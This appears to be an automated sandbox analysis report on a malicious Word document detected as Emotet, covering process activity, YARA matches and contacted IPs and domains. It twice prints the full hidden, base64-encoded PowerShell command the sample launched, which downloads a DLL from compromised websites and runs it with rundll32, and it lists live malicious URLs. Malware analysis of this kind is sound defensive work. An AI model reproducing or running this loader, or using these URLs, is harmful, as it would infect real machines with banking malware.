Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 0000000B.00000002.2116581505.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2113422714.00000000003F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2113576039.0000000000780000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2108915228.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2120708575.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2120498924.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2109055699.0000000000710000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2124089879.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2350246723.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2111700747.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2108942082.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2126847598.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2125021450.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2113404333.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2350021887.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2124035115.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2124200175.0000000000760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2126913357.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2107162967.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2116039169.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2125095238.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2120569228.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2111875145.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2127036397.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2112057590.0000000000340000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2124826552.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2349984443.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2116715619.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2106916506.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2106771774.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 8.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.780000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.760000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.780000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.760000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.260000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3f0000.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 344339 Sample: Arch_2021_717-1562532.doc Startdate: 26/01/2021 Architecture: WINDOWS Score: 100 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for dropped file 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 12 other signatures 2->55 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 26 2->17         started        process3 signatures4 63 Suspicious powershell command line found 14->63 65 Very long command line found 14->65 67 Encrypted powershell cmdline option found 14->67 19 powershell.exe 12 9 14->19         started        24 msg.exe 14->24         started        process5 dnsIp6 47 shannared.com 192.169.223.13, 49167, 80 AS-26496-GO-DADDY-COM-LLCUS United States 19->47 45 C:\Users\user\Kaktksw\An6othh4549I.dll, PE32 19->45 dropped 59 Powershell drops PE file 19->59 26 rundll32.exe 19->26         started        file7 signatures8 process9 process10 28 rundll32.exe 26->28         started        process11 30 rundll32.exe 2 28->30         started        signatures12 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->69 33 rundll32.exe 30->33         started        process13 process14 35 rundll32.exe 1 33->35         started        signatures15 57 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->57 38 rundll32.exe 35->38         started        process16 process17 40 rundll32.exe 1 38->40         started        signatures18 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->61 43 rundll32.exe 40->43         started        process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
217.160.169.110
 unknown Germany
8560 ONEANDONE-ASBrauerstrasse48DE true
51.255.203.164
 unknown France
16276 OVHFR true
84.232.229.24
 unknown Romania
8708 RCS-RDS73-75DrStaicoviciRO true
192.169.223.13
 unknown United States
26496 AS-26496-GO-DADDY-COM-LLCUS true

Contacted Domains

Name IP Active
shannared.com 192.169.223.13 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://217.160.169.110:8080/zrm2/7son14/mlqmfbi2uji6/ true
  • Avira URL Cloud: safe
 unknown
http://shannared.com/content/lhALeS/ true
  • Avira URL Cloud: malware
 unknown